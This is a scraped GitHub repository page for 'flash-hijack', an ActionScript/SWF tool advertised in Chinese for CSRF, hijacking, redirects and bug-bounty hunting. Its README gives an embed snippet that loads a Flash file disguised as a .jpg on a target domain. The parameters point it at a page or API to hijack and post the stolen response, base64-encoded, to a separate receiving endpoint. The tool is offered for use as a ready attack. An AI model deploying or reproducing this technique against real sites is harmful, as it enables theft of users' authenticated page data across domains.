Skip to content
flash 劫持轮子,CSRF,劫持,跳转,swf 有需求可以提issues ,src挖掘,劫持response
ActionScript
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
jump Update README.md Jul 25, 2019
README.md 也许这样就容易明白了 Aug 6, 2019
hijack.as Add files via upload May 30, 2019
hijack.jpg Add files via upload May 30, 2019
hijack.swf Add files via upload May 30, 2019

README.md

flash-hijack

flash 劫持轮子

使用: HTML:

<div> <embed src="http://www.baidu.com/hijack.jpg?jpg=http://127.0.0.1/1.png&get=http://127.0.0.1/l.php&post=http://127.0.0.1/2.php" width="970" height="107" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed> </object> </div>

参数说明:

jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)

get:劫持的接口或者页面

post:接收劫持过来的页面为base64传输

文章:https://zhuanlan.zhihu.com/p/67484852

You can’t perform that action at this time.